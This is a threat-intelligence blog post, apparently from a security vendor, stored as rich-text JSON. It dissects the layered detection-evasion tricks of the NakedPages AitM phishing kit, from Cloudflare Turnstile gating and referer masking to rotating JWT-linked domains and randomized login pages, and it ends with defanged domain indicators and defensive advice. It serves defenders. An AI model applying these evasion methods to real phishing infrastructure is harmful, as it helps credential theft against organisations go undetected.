lambdas.",{"data":140060,"content":140061,"nodeType":178},{},[140062],{"data":140063,"marks":140064,"value":140065,"nodeType":173},{},[],"The benefit to the attacker is that this gives them a highly reputable primary domain as it is one owned and operated by Cloudflare. Flagging recently registered or uncategorized/rare domains for further analysis won’t work for this. For example, the URL used in this instance was the following:",{"data":140067,"content":140068,"nodeType":178},{},[140069],{"data":140070,"marks":140071,"value":140073,"nodeType":173},{},[140072],{"type":13816},"hxxps://226028cc.502f135e3e036e726fba22d4.workers.dev",{"data":140075,"content":140076,"nodeType":178},{},[140077,140081,140090],{"data":140078,"marks":140079,"value":140080,"nodeType":173},{},[],"For other examples of Cloudflare Workers being abused for phishing, ",{"data":140082,"content":140084,"nodeType":186},{"uri":140083},"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/its-raining-phish-and-scams-how-cloudflare-pages-dev-and-workers-dev-domains-get-abused/",[140085],{"data":140086,"marks":140087,"value":140089,"nodeType":173},{},[140088],{"type":194},"check out this blog post from Trustwave",{"data":140091,"marks":140092,"value":1477,"nodeType":173},{},[],{"data":140094,"content":140095,"nodeType":169},{},[140096],{"data":140097,"marks":140098,"value":140099,"nodeType":173},{},[],"Step 2: Cloudflare Turnstile for bot detection",{"data":140101,"content":140102,"nodeType":178},{},[140103],{"data":140104,"marks":140105,"value":140106,"nodeType":173},{},[],"The only purpose of the Cloudflare Worker is to act as a bot gateway to prevent automated analysis getting further than this point. For this it uses Cloudflare Turnstile. Turnstile is a highly effective tool for detecting the difference between bots and human users as a replacement for CAPTCHAs used by websites across the world. ",{"data":140108,"content":140109,"nodeType":178},{},[140110],{"data":140111,"marks":140112,"value":140113,"nodeType":173},{},[],"If it doesn’t work transparently then you’ll probably see something like this:",{"data":140115,"content":140118,"nodeType":312},{"target":140116},{"sys":140117},{"id":129117,"type":317,"linkType":318},[],{"data":140120,"content":140121,"nodeType":178},{},[140122],{"data":140123,"marks":140124,"value":140125,"nodeType":173},{},[],"However, who else wants to keep out the bots? Well, phishers of course! There are many sandbox environments and other automated platforms out there, visiting every URL they come across in the search for malicious behavior. This stops many of them in their tracks as they never get past the Turnstile check. ",{"data":140127,"content":140128,"nodeType":178},{},[140129,140133,140142,140146,140155],{"data":140130,"marks":140131,"value":140132,"nodeType":173},{},[],"Malicious use of Turnstile use has become much more common now. Examples include other criminal kits ",{"data":140134,"content":140136,"nodeType":186},{"uri":140135},"https://blog.sekoia.io/tycoon-2fa-an-in-depth-analysis-of-the-latest-version-of-the-aitm-phishing-kit/",[140137],{"data":140138,"marks":140139,"value":140141,"nodeType":173},{},[140140],{"type":194},"such as Tycoon",{"data":140143,"marks":140144,"value":140145,"nodeType":173},{},[],", as well as ",{"data":140147,"content":140149,"nodeType":186},{"uri":140148},"https://fin3ss3g0d.net/index.php/2024/04/08/evilgophishs-approach-to-advanced-bot-detection-with-cloudflare-turnstile/",[140150],{"data":140151,"marks":140152,"value":140154,"nodeType":173},{},[140153],{"type":194},"open-source phishing tools focused on red teaming",{"data":140156,"marks":140157,"value":2340,"nodeType":173},{},[],{"data":140159,"content":140160,"nodeType":169},{},[140161],{"data":140162,"marks":140163,"value":140164,"nodeType":173},{},[],"Step 3: Required URL parameters and custom auth headers",{"data":140166,"content":140167,"nodeType":178},{},[140168],{"data":140169,"marks":140170,"value":140171,"nodeType":173},{},[],"If you get past Turnstile, then you’ll finally be redirected to a more conventionally suspicious domain. However, you’ll need to supply the correct URL parameters and headers, or that request might behave differently. ",{"data":140173,"content":140174,"nodeType":178},{},[140175],{"data":140176,"marks":140177,"value":140178,"nodeType":173},{},[],"Suspicious domains can be found and interrogated through other means, such as observing new domain registrations or certificate transparency logs. In this case, the phishers add other steps involving required URL parameters and custom headers. This means that a defender who knows the domain name can’t discover the malicious behavior just by making a simple HTTP(S) request to the domain.",{"data":140180,"content":140181,"nodeType":178},{},[140182],{"data":140183,"marks":140184,"value":140185,"nodeType":173},{},[],"The following code snippet shows how this operates. Bonus points for spotting how they actually forgot to implement their own RSA encryption function and instead send their “encrypted” user agents in clear text:",{"data":140187,"content":140191,"nodeType":312},{"target":140188},{"sys":140189},{"id":140190,"type":317,"linkType":318},"45aif31bot9phquQPkz20p",[],{"data":140193,"content":140194,"nodeType":169},{},[140195],{"data":140196,"marks":140197,"value":140198,"nodeType":173},{},[],"Step 4: Requiring JavaScript execution",{"data":140200,"content":140201,"nodeType":178},{},[140202],{"data":140203,"marks":140204,"value":140205,"nodeType":173},{},[],"Another aspect of the previous step is that it requires JavaScript to execute. That means defensive techniques that simply make HTTP(S) requests and scrape content will not automatically be able to follow the link without allowing JavaScript execution. This forces the use of dynamic sandbox techniques that actually load a DOM, as it’s almost impossible for static analysis to generically solve this problem.",{"data":140207,"content":140208,"nodeType":169},{},[140209],{"data":140210,"marks":140211,"value":140212,"nodeType":173},{},[],"Step 5: Redirecting to legitimate domains",{"data":140214,"content":140215,"nodeType":178},{},[140216,140220,140228,140232,140241],{"data":140217,"marks":140218,"value":140219,"nodeType":173},{},[],"Attackers will also redirect to legitimate domains to mask their activity. Let’s say a defender has visited the attacker’s malicious domain without executing JavaScript or supplying the correct URL parameters. The attacker doesn’t want to activate their malicious phishing behavior at this point, so they need to do something benign instead. In this case, they simply redirect to ",{"data":140221,"content":140223,"nodeType":186},{"uri":140222},"https://example.com",[140224],{"data":140225,"marks":140226,"value":140222,"nodeType":173},{},[140227],{"type":194},{"data":140229,"marks":140230,"value":140231,"nodeType":173},{},[],". Interestingly, ",{"data":140233,"content":140235,"nodeType":186},{"uri":140234},"https://www.youtube.com/watch?v=-W-LxcbUxI4&t=643s",[140236],{"data":140237,"marks":140238,"value":140240,"nodeType":173},{},[140239],{"type":194},"EvilProxy has also been seen redirecting to example.com too",{"data":140242,"marks":140243,"value":39946,"nodeType":173},{},[],{"data":140245,"content":140249,"nodeType":312},{"target":140246},{"sys":140247},{"id":140248,"type":317,"linkType":318},"450Y7W1uXVkKSps5y0xhBe",[],{"data":140251,"content":140252,"nodeType":169},{},[140253],{"data":140254,"marks":140255,"value":140256,"nodeType":173},{},[],"Step 6: HTTP referer header masking",{"data":140258,"content":140259,"nodeType":178},{},[140260],{"data":140261,"marks":140262,"value":140263,"nodeType":173},{},[],"Maintainers of legitimate websites often look at the HTTP referer header to see where they are being linked from. This is often a critical task for businesses, particularly for things like marketing. However, what if employees spot strange redirects coming in from suspicious looking domains like the ones used by this phishing kit? Perhaps they might investigate those domains and/or tip off relevant security vendors and organizations. ",{"data":140265,"content":140266,"nodeType":178},{},[140267,140271,140279,140283,140291],{"data":140268,"marks":140269,"value":140270,"nodeType":173},{},[],"Unless, of course, you were to use a service to mask the HTTP referrer – which is exactly what the phishing kit does in this case. NakedPages makes use of ",{"data":140272,"content":140274,"nodeType":186},{"uri":140273},"https://href.li/",[140275],{"data":140276,"marks":140277,"value":140273,"nodeType":173},{},[140278],{"type":194},{"data":140280,"marks":140281,"value":140282,"nodeType":173},{},[]," as a service to strip the referral to ensure the redirection is performed anonymously. Rather conveniently, it seems the default example that ",{"data":140284,"content":140286,"nodeType":186},{"uri":140285},"https://href.li",[140287],{"data":140288,"marks":140289,"value":140285,"nodeType":173},{},[140290],{"type":194},{"data":140292,"marks":140293,"value":140294,"nodeType":173},{},[]," uses is… example.com:",{"data":140296,"content":140300,"nodeType":312},{"target":140297},{"sys":140298},{"id":140299,"type":317,"linkType":318},"78xFQwTG1r0YWGJ24iEdYP",[],{"data":140302,"content":140303,"nodeType":169},{},[140304],{"data":140305,"marks":140306,"value":140307,"nodeType":173},{},[],"Step 7: Loading balanced domains",{"data":140309,"content":140310,"nodeType":178},{},[140311],{"data":140312,"marks":140313,"value":140314,"nodeType":173},{},[],"You’re probably thinking: Step 7? Surely, if a victim’s browser has finally made it this far then the attackers would just serve up the malicious phishing content at this point, right? Well, we aren’t quite done yet. These initial gateway servers are one of the most important components to keep undetected, as existing phishing campaigns and (as yet unread) emails will be leading to them.",{"data":140316,"content":140317,"nodeType":178},{},[140318],{"data":140319,"marks":140320,"value":140321,"nodeType":173},{},[],"Once we get to the more obviously malicious phishing activity, there is a higher chance of detection and user reports. In this case the phishing kit actually retrieves a new URL to redirect to, along with a suitable JWT authentication parameter. The benefit of this is that when URLs/hostnames get flagged as malicious, blocked or otherwise taken down, the phishing kit can just redirect to other hostnames, and the attacker’s can keep updating with new URLs over time. ",{"data":140323,"content":140324,"nodeType":178},{},[140325],{"data":140326,"marks":140327,"value":140328,"nodeType":173},{},[],"Below we can see an example of the response containing a URL, with a JWT auth parameter:",{"data":140330,"content":140334,"nodeType":312},{"target":140331},{"sys":140332},{"id":140333,"type":317,"linkType":318},"4NpH7V5oEdTASNNJsqCJ47",[],{"data":140336,"content":140340,"nodeType":312},{"target":140337},{"sys":140338},{"id":140339,"type":317,"linkType":318},"7oqkrhNXtyOlJMEz0BZyLo",[],{"data":140342,"content":140343,"nodeType":178},{},[140344],{"data":140345,"marks":140346,"value":140347,"nodeType":173},{},[],"Automating this request in this example brings back around 20 different primary domains used for the final phishing attack. These domains are rotated over time as some are blocked and new ones are created.",{"data":140349,"content":140350,"nodeType":169},{},[140351],{"data":140352,"marks":140353,"value":140354,"nodeType":173},{},[],"Step 8: Breaking login page signatures",{"data":140356,"content":140357,"nodeType":178},{},[140358],{"data":140359,"marks":140360,"value":140361,"nodeType":173},{},[],"If all the previous checks have passed then a victim user is finally presented with a phishing page. The attacker has most closely emulated the sign-on page for live.com for Outlook in this case, though it also has some aspects from a business Microsoft login too, as we can see in the examples below:",{"data":140363,"content":140367,"nodeType":312},{"target":140364},{"sys":140365},{"id":140366,"type":317,"linkType":318},"2Ez0fgAlmkrisdQGWfL6CV",[],{"data":140369,"content":140370,"nodeType":178},{},[140371],{"data":140372,"marks":140373,"value":140374,"nodeType":173},{},[],"However, one obvious change can be seen in the HTML title in the tab header. This normally says something like “Sign in to Outlook” or “Sign in to your account”. In this case, the phishing kit has randomized the HTML title. \n\nOne super easy way to detect websites pretending to be common login pages that have 1:1 cloned the website or are performing full reverse proxy AiTM techniques would be to search for obvious HTML content like this. Not many legitimate websites should have an HTML title of “Sign in to Outlook” other than Microsoft’s own legitimate domains for it, right?",{"data":140376,"content":140377,"nodeType":178},{},[140378],{"data":140379,"marks":140380,"value":140381,"nodeType":173},{},[],"Taking a closer look, we’ll see that the HTML, DOM and JavaScript etc. differ quite significantly from the true login pages, even if the visual appearance is very similar. One reason for this is to make it harder for defenders to simply signature on specific aspects of commonly spoofed login pages.",{"data":140383,"content":140384,"nodeType":169},{},[140385],{"data":140386,"marks":140387,"value":140388,"nodeType":173},{},[],"Step 9: B2B targeting",{"data":140390,"content":140391,"nodeType":178},{},[140392],{"data":140393,"marks":140394,"value":140395,"nodeType":173},{},[],"The final interesting aspect of this particular example is that it modifies its behavior during the login process depending on whether a personal Microsoft account or an organization account is used.",{"data":140397,"content":140398,"nodeType":178},{},[140399,140403,140411],{"data":140400,"marks":140401,"value":140402,"nodeType":173},{},[],"When entering an email address associated with a personal Microsoft account, or picking ‘personal account’ when prompted after entering an email address that is used for both purposes, the server will return a 302 redirect and send the user to ",{"data":140404,"content":140406,"nodeType":186},{"uri":140405},"https://login.live.com/",[140407],{"data":140408,"marks":140409,"value":140405,"nodeType":173},{},[140410],{"type":194},{"data":140412,"marks":140413,"value":140414,"nodeType":173},{},[]," where they can then re-enter their credentials and login to Microsoft legitimately if they continue. This reduces the potential for detection further as no AitM phishing login will actually occur.",{"data":140416,"content":140417,"nodeType":178},{},[140418,140422,140427],{"data":140419,"marks":140420,"value":140421,"nodeType":173},{},[],"On the other hand, when using an organization account the phishing process continues as expected. ",{"data":140423,"marks":140424,"value":140426,"nodeType":173},{},[140425],{"type":370},"This phishing campaign is exclusively targeting corp accounts",{"data":140428,"marks":140429,"value":140430,"nodeType":173},{},[]," and you could almost say it has a B2B (or is that A2B?) rather than B2C business model.  ",{"data":140432,"content":140433,"nodeType":169},{},[140434],{"data":140435,"marks":140436,"value":40632,"nodeType":173},{},[],{"data":140438,"content":140439,"nodeType":178},{},[140440],{"data":140441,"marks":140442,"value":140443,"nodeType":173},{},[],"As you may have guessed from the extremely suspicious domains in use and examples of sloppy coding (like forgetting to implement an encryption function) the NakedPages kit is far from sophisticated. Despite this, the tricks that attackers are using to make detection and analysis more difficult seem to be quite effective when used in a layered model. ",{"data":140445,"content":140446,"nodeType":178},{},[140447],{"data":140448,"marks":140449,"value":140450,"nodeType":173},{},[],"For example, at the time of writing this particular Worker had been up for at least two days and was currently only triggering 1 detection on VirusTotal. ",{"data":140452,"content":140456,"nodeType":312},{"target":140453},{"sys":140454},{"id":140455,"type":317,"linkType":318},"1mIOpDtmgcMasK6dEhRHsm",[],{"data":140458,"content":140459,"nodeType":178},{},[140460],{"data":140461,"marks":140462,"value":140463,"nodeType":173},{},[],"One key takeaway is that it’s near impossible to stay on top of all the phishing servers on the internet. Even the untargeted mass campaigns will initially be missed by TI feeds, let alone the targeted ones. ",{"data":140465,"content":140466,"nodeType":178},{},[140467,140471,140479],{"data":140468,"marks":140469,"value":140470,"nodeType":173},{},[],"The best foot forward for resilience against these attacks is through the use of domain-bound MFA methods like WebAuthn. Common MFA methods like OTPs, SMS, push notifications etc. are routinely bypassed using ",{"data":140472,"content":140473,"nodeType":186},{"uri":49844},[140474],{"data":140475,"marks":140476,"value":140478,"nodeType":173},{},[140477],{"type":194},"AitM techniques that proxy the MFA authentication as well",{"data":140480,"marks":140481,"value":140482,"nodeType":173},{},[],". Even if you are one of the few who use phishing-resistant MFA methods like WebAuthn or other passkeys, the devil is in the detail and we’ve seen MFA downgrade attacks being used to bypass them by choosing a phishable method that’s also active.",{"data":140484,"content":140488,"nodeType":312},{"target":140485},{"sys":140486},{"id":140487,"type":317,"linkType":318},"17lSgRFD6fDzRUn9eOHJg6",[],{"data":140490,"content":140491,"nodeType":169},{},[140492],{"data":140493,"marks":140494,"value":140495,"nodeType":173},{},[],"P.S. How did we detect this?",{"data":140497,"content":140498,"nodeType":178},{},[140499,140503,140508,140512,140520],{"data":140500,"marks":140501,"value":140502,"nodeType":173},{},[],"After all that, you might be wondering how we managed to automate a process to generically pass through all these detection evasion techniques – ",{"data":140504,"marks":140505,"value":140507,"nodeType":173},{},[140506],{"type":370},"well the short answer is: We didn’t.",{"data":140509,"marks":140510,"value":140511,"nodeType":173},{},[]," Instead, we detected the act of an employee ",{"data":140513,"content":140514,"nodeType":186},{"uri":9099},[140515],{"data":140516,"marks":140517,"value":140519,"nodeType":173},{},[140518],{"type":194},"attempting to put their Microsoft password into a website that wasn’t Microsoft",{"data":140521,"marks":140522,"value":1477,"nodeType":173},{},[],{"data":140524,"content":140525,"nodeType":178},{},[140526],{"data":140527,"marks":140528,"value":140529,"nodeType":173},{},[],"The TTP for phishing is effectively “trick someone into putting their valid credentials into the wrong site” – so detecting that behavior directly (the action of entering a legit password into the wrong site) can be a lot simpler and more effective than playing the cat-and-mouse detection → detection-evasion game.",{"data":140531,"content":140532,"nodeType":178},{},[140533],{"data":140534,"marks":140535,"value":140536,"nodeType":173},{},[],"Having said that, if you’re interested, here are the domain IOCs for this campaign:",{"data":140538,"content":140539,"nodeType":178},{},[140540],{"data":140541,"marks":140542,"value":140544,"nodeType":173},{},[140543],{"type":13816},"226028cc[.]502f135e3e036e726fba22d4[.]workers[.]dev\nacevoorgukmembership[.]buzz\nalerteditorroyalsocietyorgnz[.]buzz\nandymarshallsgeniuslocidigestghostiomghostio[.]buzz\nblogresponseinsperitycom[.]buzz\ncampaigneventbritecomnoreply[.]buzz\ncharityexcellencer1technologytrustnewsorg[.]buzz\nclerkenwelldesignweekcomnoreply[.]buzz\nconfirminfothetrainlinecomauto[.]buzz\nhealthestatejournalcomnoreply[.]buzz\nmentalhealthdesignandbuildcomnoreply[.]buzz\nnoreplynotificationswhoopcom[.]buzz\nstepexhibitionscomeventsupport[.]buzz\ntheathletice1theathleticcom[.]buzz\nthekakahoonssubstackcom[.]buzz","How AitM phishing kits evade detection","Taking a closer look at the steps that AitM phishing kits take to hide from the prying eyes of security teams and threat intelligence vendors.","2024-07-23T00:00:00.000Z","how-aitm-phishing-kits-evade-detection",{"items":140550},[140551,140553],{"sys":140552,"name":509},{"id":508},{"sys":140554,"name":505},{"id":504},{"items":140556},[140557],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":140558},{"url":8615},{"__typename":1528,"sys":140560,"content":140561,"title":126606,"synopsis":126607,"hashTags":118,"publishedDate":71823,"slug":126608,"tagsCollection":141564,"authorsCollection":141570},{"id":125444},{"json":140562},{"data":140563,"content":140564,"nodeType":165},{},[140565,140571,140618,140624,140627,140633,140639,140665,140675,140678,140684,140694,140700,140716,140721,140737,140743,140753,140770,140786,140792,140808,140813,140829,140832,140838,140845,140851,140867,140883,140889,140905,140911,140918,140939,140945,140961,140978,140983,140989,141005,141008,141014,141030,141046,141052,141100,141106,141109,141115,141122,141138,141154,141160,141167,141173,141190,141196,141202,141207,141212,141215,141221,141228,141234,141250,141259,141275,141281,141287,141296,141303,141309,141326,141331,141334,141340,141346,141352,141413,141419,141425,141431,141438,141455,141461,141466,141476,141493,141499,141506,141523,141529,141535,141540,141543,141549],{"data":140566,"content":140567,"nodeType":178},{},[140568],{"data":140569,"marks":140570,"value":125455,"nodeType":173},{},[],{"data":140572,"content":140573,"nodeType":250},{},[140574,140590,140599],{"data":140575,"content":140576,"nodeType":254},{},[140577],{"data":140578,"content":140579,"nodeType":178},{},[140580,140583,140587],{"data":140581,"marks":140582,"value":125468,"nodeType":173},{},[],{"data":140584,"marks":140585,"value":125473,"nodeType":173},{},[140586],{"type":1646},{"data":140588,"marks":140589,"value":125477,"nodeType":173},{},[],{"data":140591,"content":140592,"nodeType":254},{},[140593],{"data":140594,"content":140595,"nodeType":178},{},[140596],{"data":140597,"marks":140598,"value":125487,"nodeType":173},{},[],{"data":140600,"content":140601,"nodeType":254},{},[140602],{"data":140603,"content":140604,"nodeType":178},{},[140605,140608,140615],{"data":140606,"marks":140607,"value":125497,"nodeType":173},{},[],{"data":140609,"content":140610,"nodeType":186},{"uri":125500},[140611],{"data":140612,"marks":140613,"value":125506,"nodeType":173},{},[140614],{"type":194},{"data":140616,"marks":140617,"value":125510,"nodeType":173},{},[],{"data":140619,"content":140620,"nodeType":178},{},[140621],{"data":140622,"marks":140623,"value":125517,"nodeType":173},{},[],{"data":140625,"content":140626,"nodeType":231},{},[],{"data":140628,"content":140629,"nodeType":169},{},[140630],{"data":140631,"marks":140632,"value":125527,"nodeType":173},{},[],{"data":140634,"content":140635,"nodeType":178},{},[140636],{"data":140637,"marks":140638,"value":125534,"nodeType":173},{},[],{"data":140640,"content":140641,"nodeType":178},{},[140642,140645,140652,140655,140662],{"data":140643,"marks":140644,"value":125541,"nodeType":173},{},[],{"data":140646,"content":140647,"nodeType":186},{"uri":125544},[140648],{"data":140649,"marks":140650,"value":125550,"nodeType":173},{},[140651],{"type":194},{"data":140653,"marks":140654,"value":125554,"nodeType":173},{},[],{"data":140656,"content":140657,"nodeType":186},{"uri":125557},[140658],{"data":140659,"marks":140660,"value":125563,"nodeType":173},{},[140661],{"type":194},{"data":140663,"marks":140664,"value":125567,"nodeType":173},{},[],{"data":140666,"content":140667,"nodeType":178},{},[140668,140671],{"data":140669,"marks":140670,"value":125574,"nodeType":173},{},[],{"data":140672,"marks":140673,"value":125579,"nodeType":173},{},[140674],{"type":370},{"data":140676,"content":140677,"nodeType":231},{},[],{"data":140679,"content":140680,"nodeType":169},{},[140681],{"data":140682,"marks":140683,"value":125589,"nodeType":173},{},[],{"data":140685,"content":140686,"nodeType":235},{},[140687,140691],{"data":140688,"marks":140689,"value":77025,"nodeType":173},{},[140690],{"type":370},{"data":140692,"marks":140693,"value":3107,"nodeType":173},{},[],{"data":140695,"content":140696,"nodeType":178},{},[140697],{"data":140698,"marks":140699,"value":125606,"nodeType":173},{},[],{"data":140701,"content":140702,"nodeType":178},{},[140703,140706,140713],{"data":140704,"marks":140705,"value":125613,"nodeType":173},{},[],{"data":140707,"content":140708,"nodeType":186},{"uri":40823},[140709],{"data":140710,"marks":140711,"value":125621,"nodeType":173},{},[140712],{"type":194},{"data":140714,"marks":140715,"value":125625,"nodeType":173},{},[],{"data":140717,"content":140720,"nodeType":312},{"target":140718},{"sys":140719},{"id":125630,"type":317,"linkType":318},[],{"data":140722,"content":140723,"nodeType":178},{},[140724,140727,140734],{"data":140725,"marks":140726,"value":125638,"nodeType":173},{},[],{"data":140728,"content":140729,"nodeType":186},{"uri":111565},[140730],{"data":140731,"marks":140732,"value":125646,"nodeType":173},{},[140733],{"type":194},{"data":140735,"marks":140736,"value":125650,"nodeType":173},{},[],{"data":140738,"content":140739,"nodeType":178},{},[140740],{"data":140741,"marks":140742,"value":125657,"nodeType":173},{},[],{"data":140744,"content":140745,"nodeType":235},{},[140746,140750],{"data":140747,"marks":140748,"value":24287,"nodeType":173},{},[140749],{"type":370},{"data":140751,"marks":140752,"value":3107,"nodeType":173},{},[],{"data":140754,"content":140755,"nodeType":178},{},[140756,140759,140767],{"data":140757,"marks":140758,"value":125674,"nodeType":173},{},[],{"data":140760,"content":140761,"nodeType":186},{"uri":9099},[140762],{"data":140763,"marks":140764,"value":125683,"nodeType":173},{},[140765,140766],{"type":194},{"type":370},{"data":140768,"marks":140769,"value":125687,"nodeType":173},{},[],{"data":140771,"content":140772,"nodeType":178},{},[140773,140776,140783],{"data":140774,"marks":140775,"value":125694,"nodeType":173},{},[],{"data":140777,"content":140778,"nodeType":186},{"uri":125697},[140779],{"data":140780,"marks":140781,"value":125703,"nodeType":173},{},[140782],{"type":194},{"data":140784,"marks":140785,"value":125707,"nodeType":173},{},[],{"data":140787,"content":140788,"nodeType":178},{},[140789],{"data":140790,"marks":140791,"value":125714,"nodeType":173},{},[],{"data":140793,"content":140794,"nodeType":178},{},[140795,140798,140805],{"data":140796,"marks":140797,"value":125721,"nodeType":173},{},[],{"data":140799,"content":140800,"nodeType":186},{"uri":4492},[140801],{"data":140802,"marks":140803,"value":125729,"nodeType":173},{},[140804],{"type":194},{"data":140806,"marks":140807,"value":125733,"nodeType":173},{},[],{"data":140809,"content":140812,"nodeType":312},{"target":140810},{"sys":140811},{"id":125738,"type":317,"linkType":318},[],{"data":140814,"content":140815,"nodeType":178},{},[140816,140819,140826],{"data":140817,"marks":140818,"value":125746,"nodeType":173},{},[],{"data":140820,"content":140821,"nodeType":186},{"uri":125749},[140822],{"data":140823,"marks":140824,"value":125755,"nodeType":173},{},[140825],{"type":194},{"data":140827,"marks":140828,"value":125759,"nodeType":173},{},[],{"data":140830,"content":140831,"nodeType":231},{},[],{"data":140833,"content":140834,"nodeType":169},{},[140835],{"data":140836,"marks":140837,"value":125769,"nodeType":173},{},[],{"data":140839,"content":140840,"nodeType":235},{},[140841],{"data":140842,"marks":140843,"value":77025,"nodeType":173},{},[140844],{"type":370},{"data":140846,"content":140847,"nodeType":178},{},[140848],{"data":140849,"marks":140850,"value":125783,"nodeType":173},{},[],{"data":140852,"content":140853,"nodeType":178},{},[140854,140857,140864],{"data":140855,"marks":140856,"value":125790,"nodeType":173},{},[],{"data":140858,"content":140859,"nodeType":186},{"uri":49844},[140860],{"data":140861,"marks":140862,"value":125798,"nodeType":173},{},[140863],{"type":194},{"data":140865,"marks":140866,"value":125802,"nodeType":173},{},[],{"data":140868,"content":140869,"nodeType":178},{},[140870,140873,140880],{"data":140871,"marks":140872,"value":125809,"nodeType":173},{},[],{"data":140874,"content":140875,"nodeType":186},{"uri":125812},[140876],{"data":140877,"marks":140878,"value":1255,"nodeType":173},{},[140879],{"type":194},{"data":140881,"marks":140882,"value":53584,"nodeType":173},{},[],{"data":140884,"content":140885,"nodeType":178},{},[140886],{"data":140887,"marks":140888,"value":125827,"nodeType":173},{},[],{"data":140890,"content":140891,"nodeType":178},{},[140892,140895,140902],{"data":140893,"marks":140894,"value":125834,"nodeType":173},{},[],{"data":140896,"content":140897,"nodeType":186},{"uri":74693},[140898],{"data":140899,"marks":140900,"value":125842,"nodeType":173},{},[140901],{"type":194},{"data":140903,"marks":140904,"value":125846,"nodeType":173},{},[],{"data":140906,"content":140907,"nodeType":178},{},[140908],{"data":140909,"marks":140910,"value":125853,"nodeType":173},{},[],{"data":140912,"content":140913,"nodeType":235},{},[140914],{"data":140915,"marks":140916,"value":24287,"nodeType":173},{},[140917],{"type":370},{"data":140919,"content":140920,"nodeType":178},{},[140921,140924,140932,140936],{"data":140922,"marks":140923,"value":125867,"nodeType":173},{},[],{"data":140925,"content":140926,"nodeType":186},{"uri":75048},[140927],{"data":140928,"marks":140929,"value":125876,"nodeType":173},{},[140930,140931],{"type":194},{"type":370},{"data":140933,"marks":140934,"value":125881,"nodeType":173},{},[140935],{"type":370},{"data":140937,"marks":140938,"value":197,"nodeType":173},{},[],{"data":140940,"content":140941,"nodeType":178},{},[140942],{"data":140943,"marks":140944,"value":125891,"nodeType":173},{},[],{"data":140946,"content":140947,"nodeType":178},{},[140948,140951,140958],{"data":140949,"marks":140950,"value":125898,"nodeType":173},{},[],{"data":140952,"content":140953,"nodeType":186},{"uri":125901},[140954],{"data":140955,"marks":140956,"value":74524,"nodeType":173},{},[140957],{"type":194},{"data":140959,"marks":140960,"value":125910,"nodeType":173},{},[],{"data":140962,"content":140963,"nodeType":178},{},[140964,140967,140975],{"data":140965,"marks":140966,"value":125917,"nodeType":173},{},[],{"data":140968,"content":140969,"nodeType":186},{"uri":75027},[140970],{"data":140971,"marks":140972,"value":125926,"nodeType":173},{},[140973,140974],{"type":194},{"type":370},{"data":140976,"marks":140977,"value":125930,"nodeType":173},{},[],{"data":140979,"content":140982,"nodeType":312},{"target":140980},{"sys":140981},{"id":125935,"type":317,"linkType":318},[],{"data":140984,"content":140985,"nodeType":178},{},[140986],{"data":140987,"marks":140988,"value":125943,"nodeType":173},{},[],{"data":140990,"content":140991,"nodeType":178},{},[140992,140995,141002],{"data":140993,"marks":140994,"value":125950,"nodeType":173},{},[],{"data":140996,"content":140997,"nodeType":186},{"uri":81621},[140998],{"data":140999,"marks":141000,"value":125958,"nodeType":173},{},[141001],{"type":194},{"data":141003,"marks":141004,"value":125962,"nodeType":173},{},[],{"data":141006,"content":141007,"nodeType":231},{},[],{"data":141009,"content":141010,"nodeType":169},{},[141011],{"data":141012,"marks":141013,"value":125972,"nodeType":173},{},[],{"data":141015,"content":141016,"nodeType":178},{},[141017,141020,141027],{"data":141018,"marks":141019,"value":125979,"nodeType":173},{},[],{"data":141021,"content":141022,"nodeType":186},{"uri":125982},[141023],{"data":141024,"marks":141025,"value":1300,"nodeType":173},{},[141026],{"type":194},{"data":141028,"marks":141029,"value":1477,"nodeType":173},{},[],{"data":141031,"content":141032,"nodeType":178},{},[141033,141036,141043],{"data":141034,"marks":141035,"value":125997,"nodeType":173},{},[],{"data":141037,"content":141038,"nodeType":186},{"uri":819},[141039],{"data":141040,"marks":141041,"value":126005,"nodeType":173},{},[141042],{"type":194},{"data":141044,"marks":141045,"value":126009,"nodeType":173},{},[],{"data":141047,"content":141048,"nodeType":178},{},[141049],{"data":141050,"marks":141051,"value":126016,"nodeType":173},{},[],{"data":141053,"content":141054,"nodeType":250},{},[141055,141064,141073,141082,141091],{"data":141056,"content":141057,"nodeType":254},{},[141058],{"data":141059,"content":141060,"nodeType":178},{},[141061],{"data":141062,"marks":141063,"value":126029,"nodeType":173},{},[],{"data":141065,"content":141066,"nodeType":254},{},[141067],{"data":141068,"content":141069,"nodeType":178},{},[141070],{"data":141071,"marks":141072,"value":126039,"nodeType":173},{},[],{"data":141074,"content":141075,"nodeType":254},{},[141076],{"data":141077,"content":141078,"nodeType":178},{},[141079],{"data":141080,"marks":141081,"value":126049,"nodeType":173},{},[],{"data":141083,"content":141084,"nodeType":254},{},[141085],{"data":141086,"content":141087,"nodeType":178},{},[141088],{"data":141089,"marks":141090,"value":126059,"nodeType":173},{},[],{"data":141092,"content":141093,"nodeType":254},{},[141094],{"data":141095,"content":141096,"nodeType":178},{},[141097],{"data":141098,"marks":141099,"value":126069,"nodeType":173},{},[],{"data":141101,"content":141102,"nodeType":178},{},[141103],{"data":141104,"marks":141105,"value":126076,"nodeType":173},{},[],{"data":141107,"content":141108,"nodeType":231},{},[],{"data":141110,"content":141111,"nodeType":169},{},[141112],{"data":141113,"marks":141114,"value":126086,"nodeType":173},{},[],{"data":141116,"content":141117,"nodeType":235},{},[141118],{"data":141119,"marks":141120,"value":77025,"nodeType":173},{},[141121],{"type":370},{"data":141123,"content":141124,"nodeType":178},{},[141125,141128,141135],{"data":141126,"marks":141127,"value":37,"nodeType":173},{},[],{"data":141129,"content":141130,"nodeType":186},{"uri":126102},[141131],{"data":141132,"marks":141133,"value":126108,"nodeType":173},{},[141134],{"type":194},{"data":141136,"marks":141137,"value":126112,"nodeType":173},{},[],{"data":141139,"content":141140,"nodeType":178},{},[141141,141144,141151],{"data":141142,"marks":141143,"value":126119,"nodeType":173},{},[],{"data":141145,"content":141146,"nodeType":186},{"uri":126122},[141147],{"data":141148,"marks":141149,"value":126128,"nodeType":173},{},[141150],{"type":194},{"data":141152,"marks":141153,"value":126132,"nodeType":173},{},[],{"data":141155,"content":141156,"nodeType":178},{},[141157],{"data":141158,"marks":141159,"value":126139,"nodeType":173},{},[],{"data":141161,"content":141162,"nodeType":235},{},[141163],{"data":141164,"marks":141165,"value":24287,"nodeType":173},{},[141166],{"type":370},{"data":141168,"content":141169,"nodeType":178},{},[141170],{"data":141171,"marks":141172,"value":126153,"nodeType":173},{},[],{"data":141174,"content":141175,"nodeType":178},{},[141176,141179,141187],{"data":141177,"marks":141178,"value":4729,"nodeType":173},{},[],{"data":141180,"content":141181,"nodeType":186},{"ur